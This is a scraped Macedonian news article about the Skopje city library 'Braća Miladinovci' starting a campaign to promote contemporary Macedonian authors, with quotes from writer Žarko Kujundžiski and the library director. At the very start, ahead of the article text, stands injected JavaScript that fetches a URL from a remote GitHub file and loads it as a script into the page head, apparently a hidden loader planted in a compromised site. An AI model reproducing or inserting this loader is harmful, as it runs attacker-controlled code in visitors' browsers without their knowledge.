;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Во библиотека „Браќа Миладиновци“ започна серијата настани „Читаме современи македонски автори“ - Антропол
АктуелноЛокално

Во библиотека „Браќа Миладиновци“ започна серијата настани „Читаме современи македонски автори“

Со „Книга на месецот“, но и со „Разговорот со…“, Градска библиотека „Браќа Миладиновци“ – Скопје ја започна серијата настани под слоганот „Читаме современи македонски автори“ со цел да ги доближат домашните автори и нивните дела до нашите читатели.

Добив многу впечатоци од читатели, но јас не се осмелувам да ја прочитам одново. Мислам дека ако ја отворам ќе треба да напишам нова книга. Затоа ја оставам и ми се чини дека „Сфинга“ сѐ помалку мисли на мене, а сѐ повеќе на своите читатели. Со текот на времето папочната врвца меѓу авторот и неговото дело станува сѐ потенка.

– рече на синоќешниот разговор Жарко Кујунџиски, автор на „Сфинга на гневот“ – книга на месецот во нашата библиотека. Директорката Снежана Стојчевска, истакна:

Кампањата ќе трае осум месеци и се надеваме дека ќе ја подигнеме свесноста за вредноста на делата на современите македонски автори, кои заслужуваат внимание како и делата на странските писатели во нашите библиотеки.

Месецот посветен на „Сфинга на гневот“ ќе биде заокружен со Клуб на читатели или неформална средба на оние кои ја прочитале или сакаат да ја прочитаат оваа книга, македонски кандидат за престижната награда „Балканика“.